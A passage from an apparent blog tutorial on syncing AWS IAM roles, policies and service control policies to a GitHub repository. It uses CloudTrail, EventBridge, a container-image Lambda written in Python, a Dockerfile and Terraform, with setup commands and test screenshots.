<li>Optionally, <code>terraform destroy</code> can be used to remove all AWS resources, except for those not created by it.</li>
</ol>
<h4 id="heading-logging"><strong>Logging</strong></h4>
<ol>
<li>All Lambda function logs are stored in CloudWatch Log Groups.</li>
</ol>
<h3 id="heading-building-systems-one-click">Building systems - One click</h3>
<pre><code class="lang-bash"><span class="hljs-comment"># Change environment variables (MUST/MANDATORY)</span>
<span class="hljs-comment"># Make sure TF_VAR_GITHUB_REPO exists on your GitHub</span>
<span class="hljs-built_in">export</span> TF_VAR_GITHUB_USERNAME=rewanthtammana
<span class="hljs-built_in">export</span> TF_VAR_GITHUB_REPO=testaws
<span class="hljs-built_in">export</span> TF_VAR_GITHUB_TOKEN=

<span class="hljs-comment"># Change environment variables (Optional)</span>
<span class="hljs-built_in">export</span> TF_VAR_ECR_REPO_NAME=aws-iam-gitops

<span class="hljs-comment"># Change environment variables (Optional - the suffix is used in image name, role name, lambda function name, policy name, event bridge name, s3 bucket name &amp; cloud trail name)</span>
<span class="hljs-built_in">export</span> TF_VAR_RANDOM_SUFFIX=31
<span class="hljs-built_in">export</span> TF_VAR_RANDOM_PREFIX=aws-iam-gitops

<span class="hljs-comment"># Change environment variables - Recommended to leave them as it is but feel free to change them</span>
<span class="hljs-built_in">export</span> TF_VAR_ECR_REPO_TAG=v<span class="hljs-variable">${TF_VAR_RANDOM_SUFFIX}</span>
<span class="hljs-built_in">export</span> TF_VAR_AWS_PAGER=
<span class="hljs-built_in">export</span> TF_VAR_ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
<span class="hljs-built_in">export</span> TF_VAR_REGION=us-east-1
<span class="hljs-built_in">export</span> TF_VAR_ROLE_NAME=<span class="hljs-variable">${TF_VAR_RANDOM_PREFIX}</span>-lambda-role-<span class="hljs-variable">${TF_VAR_RANDOM_SUFFIX}</span>
<span class="hljs-built_in">export</span> TF_VAR_IMAGE=<span class="hljs-variable">${TF_VAR_ACCOUNT_ID}</span>.dkr.ecr.<span class="hljs-variable">${REGION}</span>.amazonaws.com/<span class="hljs-variable">${TF_VAR_ECR_REPO_NAME}</span>:<span class="hljs-variable">${TF_VAR_ECR_REPO_TAG}</span>
<span class="hljs-built_in">export</span> TF_VAR_LAMBDA_FUNCTION_NAME=<span class="hljs-variable">${TF_VAR_RANDOM_PREFIX}</span>-<span class="hljs-variable">${TF_VAR_RANDOM_SUFFIX}</span>
<span class="hljs-built_in">export</span> TF_VAR_POLICY_NAME=<span class="hljs-variable">${TF_VAR_RANDOM_PREFIX}</span>-lambda-permissions-<span class="hljs-variable">${TF_VAR_RANDOM_SUFFIX}</span>
<span class="hljs-built_in">export</span> TF_VAR_LAMBDA_TIMEOUT=120
<span class="hljs-built_in">export</span> TF_VAR_EVENTBRIDGE_NAME=<span class="hljs-variable">${TF_VAR_RANDOM_PREFIX}</span>-<span class="hljs-variable">${TF_VAR_RANDOM_SUFFIX}</span>
<span class="hljs-built_in">export</span> TF_VAR_S3_BUCKET_NAME=<span class="hljs-variable">${TF_VAR_RANDOM_PREFIX}</span>-<span class="hljs-variable">${TF_VAR_RANDOM_SUFFIX}</span>
<span class="hljs-built_in">export</span> TF_VAR_CLOUDTRAIL_NAME=<span class="hljs-variable">${TF_VAR_RANDOM_PREFIX}</span>-<span class="hljs-variable">${TF_VAR_RANDOM_SUFFIX}</span>

<span class="hljs-comment"># AWS components</span>
aws ecr create-repository --repository-name <span class="hljs-variable">${TF_VAR_ECR_REPO_NAME}</span>
aws ecr get-login-password --region <span class="hljs-variable">${TF_VAR_REGION}</span> | docker login --username AWS --password-stdin <span class="hljs-variable">${TF_VAR_ACCOUNT_ID}</span>.dkr.ecr.<span class="hljs-variable">${TF_VAR_REGION}</span>.amazonaws.com
docker build --platform linux/amd64 --build-arg GITHUB_USERNAME=<span class="hljs-variable">${TF_VAR_GITHUB_USERNAME}</span> --build-arg GITHUB_REPO=<span class="hljs-variable">${TF_VAR_GITHUB_REPO}</span> --build-arg GITHUB_TOKEN=<span class="hljs-variable">${TF_VAR_GITHUB_TOKEN}</span> -t <span class="hljs-variable">${TF_VAR_IMAGE}</span> .
docker push <span class="hljs-variable">${TF_VAR_IMAGE}</span>
terraform init
terraform apply
</code></pre>
<h3 id="heading-building-systems-tldr">Building systems - TLDR</h3>
<h4 id="heading-github-1">GitHub</h4>
<p>Make sure to create a Personal Access Token (PAT) with read &amp; write access to the given repository.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1692767366746/60e5066a-f81f-494a-8960-9a682c7b1d40.png" alt class="image--center mx-auto" /></p>
<h4 id="heading-initialize-variables">Initialize variables</h4>
<p>We will use Terraform to build the entire system except for ECR. Focus only on the variables that need to be changed, the other variables can be ignored.</p>
<pre><code class="lang-bash"><span class="hljs-comment"># Change environment variables (MUST/MANDATORY)</span>
<span class="hljs-comment"># Make sure TF_VAR_GITHUB_REPO exists on your GitHub</span>
<span class="hljs-built_in">export</span> TF_VAR_GITHUB_TOKEN=
<span class="hljs-built_in">export</span> TF_VAR_GITHUB_USERNAME=rewanthtammana
<span class="hljs-built_in">export</span> TF_VAR_GITHUB_REPO=testaws

<span class="hljs-comment"># Change environment variables (Optional)</span>
<span class="hljs-built_in">export</span> TF_VAR_ECR_REPO_NAME=aws-iam-gitops

<span class="hljs-comment"># Change environment variables (Optional - the suffix is used in image name, role name, lambda function name, policy name, event bridge name, s3 bucket name &amp; cloud trail name)</span>
<span class="hljs-built_in">export</span> TF_VAR_RANDOM_SUFFIX=31
<span class="hljs-built_in">export</span> TF_VAR_RANDOM_PREFIX=aws-iam-gitops

<span class="hljs-comment"># Change environment variables - Recommended to leave them as it is but feel free to change them</span>
<span class="hljs-built_in">export</span> TF_VAR_ECR_REPO_TAG=v<span class="hljs-variable">${TF_VAR_RANDOM_SUFFIX}</span>
<span class="hljs-built_in">export</span> TF_VAR_AWS_PAGER=
<span class="hljs-built_in">export</span> TF_VAR_ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
<span class="hljs-built_in">export</span> TF_VAR_REGION=us-east-1
<span class="hljs-built_in">export</span> TF_VAR_ROLE_NAME=<span class="hljs-variable">${TF_VAR_RANDOM_PREFIX}</span>-lambda-role-<span class="hljs-variable">${TF_VAR_RANDOM_SUFFIX}</span>
<span class="hljs-built_in">export</span> TF_VAR_IMAGE=<span class="hljs-variable">${TF_VAR_ACCOUNT_ID}</span>.dkr.ecr.<span class="hljs-variable">${REGION}</span>.amazonaws.com/<span class="hljs-variable">${TF_VAR_ECR_REPO_NAME}</span>:<span class="hljs-variable">${TF_VAR_ECR_REPO_TAG}</span>
<span class="hljs-built_in">export</span> TF_VAR_LAMBDA_FUNCTION_NAME=<span class="hljs-variable">${TF_VAR_RANDOM_PREFIX}</span>-<span class="hljs-variable">${TF_VAR_RANDOM_SUFFIX}</span>
<span class="hljs-built_in">export</span> TF_VAR_POLICY_NAME=<span class="hljs-variable">${TF_VAR_RANDOM_PREFIX}</span>-lambda-permissions-<span class="hljs-variable">${TF_VAR_RANDOM_SUFFIX}</span>
<span class="hljs-built_in">export</span> TF_VAR_LAMBDA_TIMEOUT=120
<span class="hljs-built_in">export</span> TF_VAR_EVENTBRIDGE_NAME=<span class="hljs-variable">${TF_VAR_RANDOM_PREFIX}</span>-<span class="hljs-variable">${TF_VAR_RANDOM_SUFFIX}</span>
<span class="hljs-built_in">export</span> TF_VAR_S3_BUCKET_NAME=<span class="hljs-variable">${TF_VAR_RANDOM_PREFIX}</span>-<span class="hljs-variable">${TF_VAR_RANDOM_SUFFIX}</span>
<span class="hljs-built_in">export</span> TF_VAR_CLOUDTRAIL_NAME=<span class="hljs-variable">${TF_VAR_RANDOM_PREFIX}</span>-<span class="hljs-variable">${TF_VAR_RANDOM_SUFFIX}</span>
</code></pre>
<h4 id="heading-lambda-function">Lambda function</h4>
<p>Let's start with writing a Lambda function that will sync the desired IAM resources to GitHub. I will use Python for the time being but feel free to use any supported tech stack.</p>
<p>To summarize the below code,</p>
<ol>
<li><p>We define a <code>handler</code> function that will be used by AWS Lambda for execution.</p>
<pre><code class="lang-python"> <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">handler</span>(<span class="hljs-params">event, context</span>):</span>
     <span class="hljs-comment">#.....</span>
</code></pre>
</li>
<li><p>Import <code>boto3</code> Python SDK to fetch AWS IAM information.</p>
<pre><code class="lang-python"> <span class="hljs-comment"># AWS clients</span>
 iam = boto3.client(<span class="hljs-string">'iam'</span>)
 orgs = boto3.client(<span class="hljs-string">'organizations'</span>)
</code></pre>
</li>
<li><p>Define placeholders for all required variables. DO NOT CHANGE THEM.</p>
<pre><code class="lang-python"> <span class="hljs-comment"># GitHub credentials</span>
 github_username = <span class="hljs-string">"GITHUB_USERNAME"</span>
 github_token = <span class="hljs-string">"GITHUB_TOKEN"</span>
 github_repo_name = <span class="hljs-string">"GITHUB_REPO"</span>
</code></pre>
</li>
<li><p>Clone the destination repository where you want to push your code. Several limitations with consuming direct APIs from <a target="_blank" href="https://github.com/PyGithub/PyGithub">PyGithub</a>, hence we will use the old way.</p>
<pre><code class="lang-python"> random_string = str(randrange(<span class="hljs-number">100</span>, <span class="hljs-number">100000</span>))
 local_repo = <span class="hljs-string">f"/tmp/<span class="hljs-subst">{random_string}</span>"</span>

 repo_url = <span class="hljs-string">f"https://<span class="hljs-subst">{github_username}</span>:<span class="hljs-subst">{github_token}</span>@github.com/<span class="hljs-subst">{github_username}</span>/<span class="hljs-subst">{github_repo_name}</span>.git"</span>
 clone_command = <span class="hljs-string">f"git clone --depth 1 <span class="hljs-subst">{repo_url}</span> <span class="hljs-subst">{local_repo}</span>"</span>
 os.system(clone_command)
</code></pre>
</li>
<li><p>Fetch the IAM information for Roles, Policies &amp; SCPs. By default AWS APIs return only 100 results, hence we have to paginate the resources for a complete list. Once we have them, create a file for each entry on GitHub.</p>
<pre><code class="lang-python"> <span class="hljs-comment"># Create new folders and populate them</span>
 <span class="hljs-keyword">for</span> client, category <span class="hljs-keyword">in</span> [(iam, <span class="hljs-string">"roles"</span>), (iam, <span class="hljs-string">"policies"</span>), (orgs, <span class="hljs-string">"scps"</span>)]:
     os.makedirs(category, exist_ok=<span class="hljs-literal">True</span>)
     items = []
     <span class="hljs-keyword">if</span> category == <span class="hljs-string">"roles"</span>:
         paginator = client.get_paginator(<span class="hljs-string">'list_roles'</span>)
         <span class="hljs-keyword">for</span> page <span class="hljs-keyword">in</span> paginator.paginate():
             items.extend(page[<span class="hljs-string">'Roles'</span>])
     <span class="hljs-keyword">elif</span> category == <span class="hljs-string">"policies"</span>:
         paginator = client.get_paginator(<span class="hljs-string">'list_policies'</span>)
         <span class="hljs-keyword">for</span> page <span class="hljs-keyword">in</span> paginator.paginate(Scope=<span class="hljs-string">'All'</span>):
             items.extend(page[<span class="hljs-string">'Policies'</span>])
     <span class="hljs-keyword">else</span>:  <span class="hljs-comment"># category == "scps"</span>
         paginator = orgs.get_paginator(<span class="hljs-string">'list_policies'</span>)
         <span class="hljs-keyword">for</span> page <span class="hljs-keyword">in</span> paginator.paginate(Filter=<span class="hljs-string">'SERVICE_CONTROL_POLICY'</span>):
             items.extend(page[<span class="hljs-string">'Policies'</span>])
         <span class="hljs-keyword">for</span> item <span class="hljs-keyword">in</span> items:
             policy_detail = orgs.describe_policy(PolicyId=item[<span class="hljs-string">'Id'</span>])
             item.update(policy_detail[<span class="hljs-string">'Policy'</span>])

     <span class="hljs-keyword">for</span> item <span class="hljs-keyword">in</span> items:
         file_name = <span class="hljs-string">f"<span class="hljs-subst">{item[<span class="hljs-string">'RoleName'</span>]}</span>.json"</span> <span class="hljs-keyword">if</span> category == <span class="hljs-string">"roles"</span> <span class="hljs-keyword">else</span> <span class="hljs-string">f"<span class="hljs-subst">{item[<span class="hljs-string">'PolicyName'</span>]}</span>.json"</span> <span class="hljs-keyword">if</span> category == <span class="hljs-string">"policies"</span> <span class="hljs-keyword">else</span> <span class="hljs-string">f"<span class="hljs-subst">{item[<span class="hljs-string">'Id'</span>]}</span>.json"</span>
         <span class="hljs-keyword">with</span> open(<span class="hljs-string">f"<span class="hljs-subst">{category}</span>/<span class="hljs-subst">{file_name}</span>"</span>, <span class="hljs-string">"w"</span>) <span class="hljs-keyword">as</span> f:
             json.dump(prettify_json(item), f, default=str, indent=<span class="hljs-number">4</span>)
</code></pre>
</li>
<li><p>After all the changes, push the code to GitHub.</p>
</li>
</ol>
<h4 id="heading-container-imagedockerfile">Container image/Dockerfile</h4>
<p>To achieve consistency, it's always recommended to run an application from a container image. We will package the above code into a container image &amp; feed it to Lambda for execution.</p>
<ol>
<li><p>Import the base image that's supported by Lambda runtime.</p>
<pre><code class="lang-dockerfile"> <span class="hljs-keyword">FROM</span> public.ecr.aws/lambda/python:<span class="hljs-number">3.11</span>
</code></pre>
</li>
<li><p>Copy the list of packages required from <code>requirements.txt</code></p>
<pre><code class="lang-dockerfile"> <span class="hljs-keyword">COPY</span><span class="bash"> requirements.txt <span class="hljs-variable">${LAMBDA_TASK_ROOT}</span></span>
</code></pre>
</li>
<li><p>If you remember, we have marked some placeholders in the above python code. We will mark them as arguments here &amp; they will be replaced accordingly during docker build.</p>
<pre><code class="lang-dockerfile"> <span class="hljs-keyword">ARG</span> GITHUB_USERNAME
 <span class="hljs-keyword">ARG</span> GITHUB_REPO
 <span class="hljs-keyword">ARG</span> GITHUB_TOKEN

 <span class="hljs-comment"># Copy function code</span>
 <span class="hljs-keyword">COPY</span><span class="bash"> lambda_function.py <span class="hljs-variable">${LAMBDA_TASK_ROOT}</span></span>
 <span class="hljs-keyword">RUN</span><span class="bash"> sed -i <span class="hljs-string">"s/GITHUB_USERNAME/<span class="hljs-variable">$GITHUB_USERNAME</span>/g"</span> <span class="hljs-variable">${LAMBDA_TASK_ROOT}</span>/lambda_function.py</span>
 <span class="hljs-keyword">RUN</span><span class="bash"> sed -i <span class="hljs-string">"s/GITHUB_REPO/<span class="hljs-variable">$GITHUB_REPO</span>/g"</span> <span class="hljs-variable">${LAMBDA_TASK_ROOT}</span>/lambda_function.py</span>
 <span class="hljs-keyword">RUN</span><span class="bash"> sed -i <span class="hljs-string">"s/GITHUB_TOKEN/<span class="hljs-variable">$GITHUB_TOKEN</span>/g"</span> <span class="hljs-variable">${LAMBDA_TASK_ROOT}</span>/lambda_function.py</span>
</code></pre>
</li>
<li><p>Install all the required packages</p>
<pre><code class="lang-dockerfile"> <span class="hljs-comment"># Install the specified packages</span>
 <span class="hljs-keyword">RUN</span><span class="bash"> pip install -r requirements.txt</span>

 <span class="hljs-keyword">RUN</span><span class="bash"> yum update &amp;&amp; yum -y install git</span>
</code></pre>
</li>
<li><p>Reference the handler function as a starting point for the container when it starts.</p>
<pre><code class="lang-dockerfile"> <span class="hljs-comment"># Set the CMD to your handler (could also be done as a parameter override outside of the Dockerfile)</span>
 <span class="hljs-keyword">CMD</span><span class="bash"> [ <span class="hljs-string">"lambda_function.handler"</span> ]</span>
</code></pre>
</li>
</ol>
<h4 id="heading-push-image-to-elastic-container-registry-ecr">Push image to Elastic Container Registry (ECR)</h4>
<ol>
<li><p>We need to create an ECR repository.</p>
<pre><code class="lang-bash"> aws ecr create-repository --repository-name <span class="hljs-variable">${TF_VAR_ECR_REPO_NAME}</span>
</code></pre>
</li>
<li><p>Login to the ECR repository</p>
<pre><code class="lang-bash"> aws ecr get-login-password --region <span class="hljs-variable">${TF_VAR_REGION}</span> | docker login --username AWS --password-stdin <span class="hljs-variable">${TF_VAR_ACCOUNT_ID}</span>.dkr.ecr.<span class="hljs-variable">${TF_VAR_REGION}</span>.amazonaws.com
</code></pre>
</li>
<li><p>Build the container image.</p>
<pre><code class="lang-bash"> docker build --platform linux/amd64 --build-arg GITHUB_USERNAME=<span class="hljs-variable">${TF_VAR_GITHUB_USERNAME}</span> --build-arg GITHUB_REPO=<span class="hljs-variable">${TF_VAR_GITHUB_REPO}</span> --build-arg GITHUB_TOKEN=<span class="hljs-variable">${TF_VAR_GITHUB_TOKEN}</span> -t <span class="hljs-variable">${TF_VAR_IMAGE}</span> .
</code></pre>
<p> <img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693036330459/091e9bf1-4b0b-4c0a-aefa-28aef16d33f7.png" alt class="image--center mx-auto" /></p>
</li>
<li><p>Push it to the ECR repository.</p>
<pre><code class="lang-bash"> docker push <span class="hljs-variable">${TF_VAR_IMAGE}</span>
</code></pre>
</li>
</ol>
<h3 id="heading-terraform-iam-lambda-eventbridge-cloudtrail-cloudwatch-s3">Terraform - IAM, Lambda, EventBridge, Cloudtrail, Cloudwatch, S3</h3>
<p>Terraform sets up a robust AWS infrastructure. We will have to set up the below things.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693037019299/fe333bfd-1e65-4417-af64-43656cef356f.png" alt class="image--center mx-auto" /></p>
<h4 id="heading-provider-block">Provider Block</h4>
<p>This block specifies that we are using AWS as our cloud provider and sets the AWS region to <code>us-east-1</code>.</p>
<pre><code class="lang-json">provider <span class="hljs-string">"aws"</span> {
  region = <span class="hljs-attr">"us-east-1"</span>
}
</code></pre>
<h4 id="heading-variable-blocks">Variable Blocks</h4>
<p>Here, we define various variables that will be used throughout the script. For example, <code>GITHUB_USERNAME</code> will store the GitHub username. Similarly, we define other variables like <code>GITHUB_REPO</code>, <code>GITHUB_TOKEN</code>, <code>ECR_REPO_NAME</code>, etc. These are extracted from the environment variables we initialized before.</p>
<pre><code class="lang-json">variable <span class="hljs-string">"GITHUB_USERNAME"</span> {
  description = <span class="hljs-attr">"GitHub username"</span>
  type        = string
}

variable <span class="hljs-string">"GITHUB_REPO"</span> {
  description = <span class="hljs-attr">"GitHub repository name"</span>
  type        = string
}

variable <span class="hljs-string">"GITHUB_TOKEN"</span> {
  description = <span class="hljs-attr">"GitHub Personal Access Token"</span>
  type        = string
  sensitive   = true
}

variable <span class="hljs-string">"ECR_REPO_NAME"</span> {
  description = <span class="hljs-attr">"ECR Repository Name"</span>
  type        = string
}

variable <span class="hljs-string">"RANDOM_SUFFIX"</span> {
  description = <span class="hljs-attr">"Random Suffix for Resource Names"</span>
  type        = string
}

variable <span class="hljs-string">"ECR_REPO_TAG"</span> {
  description = <span class="hljs-attr">"ECR Repository Tag"</span>
  type        = string
}

variable <span class="hljs-string">"AWS_PAGER"</span> {
  description = <span class="hljs-attr">"AWS Pager Environment Variable"</span>
  type        = string
  default     = <span class="hljs-attr">""</span>
}

variable <span class="hljs-string">"ACCOUNT_ID"</span> {
  description = <span class="hljs-attr">"AWS Account ID"</span>
  type        = string
}

variable <span class="hljs-string">"REGION"</span> {
  description = <span class="hljs-attr">"AWS Region"</span>
  type        = string
}

variable <span class="hljs-string">"ROLE_NAME"</span> {
  description = <span class="hljs-attr">"IAM Role Name"</span>
  type        = string
}

variable <span class="hljs-string">"IMAGE"</span> {
  description = <span class="hljs-attr">"Docker Image URI"</span>
  type        = string
}

variable <span class="hljs-string">"LAMBDA_FUNCTION_NAME"</span> {
  description = <span class="hljs-attr">"Lambda Function Name"</span>
  type        = string
}

variable <span class="hljs-string">"POLICY_NAME"</span> {
  description = <span class="hljs-attr">"IAM Policy Name"</span>
  type        = string
}

variable <span class="hljs-string">"LAMBDA_TIMEOUT"</span> {
  description = <span class="hljs-attr">"Lambda Function Timeout"</span>
  type        = number
  default     = 120
}

variable <span class="hljs-string">"EVENTBRIDGE_NAME"</span> {
  description = <span class="hljs-attr">"EventBridge name"</span>
  type        = string
}

variable <span class="hljs-string">"S3_BUCKET_NAME"</span> {
  description = <span class="hljs-attr">"S3 Bucket"</span>
  type        = string
}

variable <span class="hljs-string">"CLOUDTRAIL_NAME"</span> {
  description = <span class="hljs-attr">"Cloudtrail name"</span>
  type        = string
}
</code></pre>
<h4 id="heading-local-values">Local Values</h4>
<p>Local values are convenient names or computations that are used multiple times within a module. Here, we define a local value <code>account_id</code> to store the AWS account ID, which is fetched using <a target="_blank" href="http://data.aws"><code>data.aws</code></a><code>_caller_identity.current.account_id</code> &amp; more.</p>
<pre><code class="lang-json">locals {
  account_id = data.aws_caller_identity.current.account_id
  region     = var.REGION
  ecr_repo_name = var.ECR_REPO_NAME
  ecr_repo_tag = var.ECR_REPO_TAG
  github_username = var.GITHUB_USERNAME
  github_repo = var.GITHUB_REPO
  github_token = var.GITHUB_TOKEN
  role_name = var.ROLE_NAME
  lambda_function_name = var.LAMBDA_FUNCTION_NAME
  policy_name = var.POLICY_NAME
  lambda_timeout = var.LAMBDA_TIMEOUT
  eventbridge_name = var.EVENTBRIDGE_NAME
  s3_bucket_name = var.S3_BUCKET_NAME
  cloudtrail_name = var.CLOUDTRAIL_NAME
}
</code></pre>
<h4 id="heading-data-blocks">Data Blocks</h4>
<p>This data block fetches the current AWS account ID, user ID, and ARN, which can be used in other resources.</p>
<pre><code class="lang-json">data <span class="hljs-string">"aws_caller_identity"</span> <span class="hljs-string">"current"</span> {}
</code></pre>
<h4 id="heading-iam-role-for-lambda">IAM Role for Lambda</h4>
<p>This block creates an AWS IAM role that can be used by our Lambda function.</p>
<pre><code class="lang-json">resource <span class="hljs-string">"aws_iam_role"</span> <span class="hljs-string">"lambda_role"</span> {
  name = local.role_name

  assume_role_policy = jsonencode({
    Version = <span class="hljs-attr">"2012-10-17"</span>,
    Statement = [
      {
        Action = <span class="hljs-attr">"sts:AssumeRole"</span>,
        Effect = <span class="hljs-attr">"Allow"</span>,
        Principal = {
          Service = <span class="hljs-attr">"lambda.amazonaws.com"</span>
        }
      }
    ]
  })
}
</code></pre>
<h4 id="heading-iam-policy-for-lambda">IAM Policy for Lambda</h4>
<p>We define an IAM policy that allows the Lambda function to perform desired operations like creating CloudWatch Logs, listing IAM &amp; organization policies, describing organization policies, etc.</p>
<pre><code class="lang-json">resource <span class="hljs-string">"aws_iam_policy"</span> <span class="hljs-string">"lambda_policy"</span> {
  name        = local.policy_name
  description = <span class="hljs-attr">"Policy for Lambda function"</span>

  policy = jsonencode({
    Version = <span class="hljs-attr">"2012-10-17"</span>,
    Statement = [
      {
        Effect = <span class="hljs-attr">"Allow"</span>,
        Action = [
          <span class="hljs-attr">"logs:CreateLogGroup"</span>,
          <span class="hljs-attr">"logs:CreateLogStream"</span>,
          <span class="hljs-attr">"logs:PutLogEvents"</span>
        ],
        Resource = <span class="hljs-attr">"arn:aws:logs:${local.region}:${local.account_id}:log-group:/aws/lambda/${local.lambda_function_name}:*"</span>
      },
      {
        Effect = <span class="hljs-attr">"Allow"</span>,
        Action = [
          <span class="hljs-attr">"iam:ListPolicies"</span>,
          <span class="hljs-attr">"iam:ListRoles"</span>,
          <span class="hljs-attr">"organizations:ListPolicies"</span>,
          <span class="hljs-attr">"organizations:DescribePolicy"</span>
        ],
        Resource = <span class="hljs-attr">"*"</span>
      },
      {
        Effect = <span class="hljs-attr">"Allow"</span>,
        Action = <span class="hljs-attr">"kms:Decrypt"</span>,
        Resource = <span class="hljs-attr">"arn:aws:kms:${local.region}:${local.account_id}:key/*"</span>
      }
    ]
  })
}
</code></pre>
<h4 id="heading-attach-policy-to-role">Attach Policy to Role</h4>
<p>This block attaches the IAM policy to the IAM role that will be used by the Lambda function.</p>
<pre><code class="lang-json">resource <span class="hljs-string">"aws_iam_role_policy_attachment"</span> <span class="hljs-string">"lambda_policy_attach"</span> {
  role       = aws_iam_role.lambda_role.name
  policy_arn = aws_iam_policy.lambda_policy.arn
}
</code></pre>
<h4 id="heading-lambda-function-1">Lambda Function</h4>
<p>This block defines the Lambda function, specifying its name, role, and other configurations.</p>
<pre><code class="lang-json">resource <span class="hljs-string">"aws_lambda_function"</span> <span class="hljs-string">"lambda_function"</span> {
  function_name = local.lambda_function_name
  role          = aws_iam_role.lambda_role.arn
  package_type  = <span class="hljs-attr">"Image"</span>
  image_uri     = <span class="hljs-attr">"${local.account_id}.dkr.ecr.${local.region}.amazonaws.com/${local.ecr_repo_name}:${local.ecr_repo_tag}"</span>
  architectures = [<span class="hljs-attr">"x86_64"</span>]
  timeout       = local.lambda_timeout
}
</code></pre>
<h4 id="heading-cloudwatch-log-group">CloudWatch Log Group</h4>
<p>This block creates a CloudWatch Log Group where the Lambda function's logs will be stored. We set a retention period of 7 days but it's customizable.</p>
<pre><code class="lang-json">resource <span class="hljs-string">"aws_cloudwatch_log_group"</span> <span class="hljs-string">"lambda_log_group"</span> {
  name              = <span class="hljs-attr">"/aws/lambda/${aws_lambda_function.lambda_function.function_name}"</span>
  retention_in_days = 7
}
</code></pre>
<h4 id="heading-s3-bucket-for-cloudtrail">S3 Bucket for CloudTrail</h4>
<p>This block creates an S3 bucket that will be used by CloudTrail for logging.</p>
<pre><code class="lang-json">resource <span class="hljs-string">"aws_s3_bucket"</span> <span class="hljs-string">"cloudtrail_bucket"</span> {
  bucket = local.s3_bucket_name
  force_destroy = true
}
</code></pre>
<h4 id="heading-cloudtrail-configuration">CloudTrail Configuration</h4>
<p>This block sets up CloudTrail, specifying the above-created S3 bucket for logging and other configurations.</p>
<pre><code class="lang-json">resource <span class="hljs-string">"aws_s3_bucket_policy"</span> <span class="hljs-string">"cloudtrail_bucket_policy"</span> {
  bucket = aws_s3_bucket.cloudtrail_bucket.id

  policy = jsonencode({
    Version = <span class="hljs-attr">"2012-10-17"</span>,
    Statement = [
      {
        Sid       = <span class="hljs-attr">"AWSCloudTrailAclCheck"</span>
        Effect    = <span class="hljs-attr">"Allow"</span>
        Principal = { Service = <span class="hljs-attr">"cloudtrail.amazonaws.com"</span> }
        Action    = <span class="hljs-string">"s3:GetBucketAcl"</span>
        Resource  = aws_s3_bucket.cloudtrail_bucket.arn
      },
      {
        Sid       = <span class="hljs-attr">"AWSCloudTrailWrite"</span>
        Effect    = <span class="hljs-attr">"Allow"</span>
        Principal = { Service = <span class="hljs-attr">"cloudtrail.amazonaws.com"</span> }
        Action    = <span class="hljs-string">"s3:PutObject"</span>
        Resource  = <span class="hljs-string">"${aws_s3_bucket.cloudtrail_bucket.arn}/*"</span>
        Condition = {
          StringEquals = { <span class="hljs-attr">"s3:x-amz-acl"</span> = <span class="hljs-attr">"bucket-owner-full-control"</span> }
        }
      }
    ]
  })
}
</code></pre>
<h4 id="heading-eventbridge-rule">EventBridge Rule</h4>
<p>This block creates an EventBridge rule to capture events related to IAM and AWS Organizations. AWS IAM Roles &amp; Policies belong to <code>aws.iam</code> &amp; SCPs belong to <code>aws.organizations</code>. Hence, we need to look for both events.</p>
<pre><code class="lang-json">resource <span class="hljs-string">"aws_cloudtrail"</span> <span class="hljs-string">"cloudtrail"</span> {
  name                          = local.cloudtrail_name
  s3_bucket_name                = aws_s3_bucket.cloudtrail_bucket.bucket
  enable_logging                = true
  include_global_service_events = true
  is_multi_region_trail         = true
  enable_log_file_validation    = true
}

# Create EventBridge Rule
resource <span class="hljs-string">"aws_cloudwatch_event_rule"</span> <span class="hljs-string">"iam_and_orgs_rule"</span> {
  name        = local.eventbridge_name
  description = <span class="hljs-attr">"Capture events from IAM and Organizations"</span>

  event_pattern = jsonencode({
    <span class="hljs-attr">"source"</span> : [<span class="hljs-string">"aws.iam"</span>, <span class="hljs-string">"aws.organizations"</span>]
  })
}
</code></pre>
<h4 id="heading-lambda-permission-for-eventbridge">Lambda Permission for EventBridge</h4>
<p>This block allows EventBridge to invoke the Lambda function whenever the rule is triggered.</p>
<pre><code class="lang-json">resource <span class="hljs-string">"aws_lambda_permission"</span> <span class="hljs-string">"allow_eventbridge"</span> {
  statement_id  = <span class="hljs-attr">"AllowExecutionFromEventBridge"</span>
  action        = <span class="hljs-attr">"lambda:InvokeFunction"</span>
  function_name = aws_lambda_function.lambda_function.function_name
  principal     = <span class="hljs-attr">"events.amazonaws.com"</span>
  source_arn    = aws_cloudwatch_event_rule.iam_and_orgs_rule.arn
}
</code></pre>
<h4 id="heading-eventbridge-target">EventBridge Target</h4>
<p>This block sets the Lambda function as the target for the EventBridge rule, meaning the Lambda function will be invoked when the rule's conditions are met.</p>
<pre><code class="lang-json">resource <span class="hljs-string">"aws_cloudwatch_event_target"</span> <span class="hljs-string">"event_target"</span> {
  rule      = aws_cloudwatch_event_rule.iam_and_orgs_rule.name
  target_id = <span class="hljs-attr">"LambdaFunction"</span>
  arn       = aws_lambda_function.lambda_function.arn
}
</code></pre>
<h3 id="heading-test-the-setup">Test the setup</h3>
<p>There are many floating components. We need to test it one by one to make sure all configurations are appropriate.</p>
<h4 id="heading-lambda-1">Lambda</h4>
<p>Lambda is the core of our operations. To ensure it has required permissions, visit the lambda function &amp; click on "Test". If successful, all good. If not, fix the errors.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693037631790/14072732-aff1-4630-a5cb-38b1dd06bf87.png" alt class="image--center mx-auto" /></p>
<p>Click on the logs above to view the lambda output or for debugging purposes</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693037926961/b64fd699-5dd0-451d-a577-0934c0e7777b.png" alt class="image--center mx-auto" /></p>
<h4 id="heading-iam-1">IAM</h4>
<p>If everything is successful at Lambda, let's try to change an IAM policy &amp; see if our components can detect it &amp; forward the requests to Lambda. I love SCPs, hence I will try to edit an existing rule.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693038047062/77adfcd5-17a3-47ed-a158-cd93ff627b2a.png" alt class="image--center mx-auto" /></p>
<p>If you visit GitHub, you should see a commit with the updated SCP policy.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693038135105/44376413-c4d4-44d8-a99f-19b000aad5d4.png" alt class="image--center mx-auto" /></p>
<p>You can view the full file &amp; the updated policy information.</p>
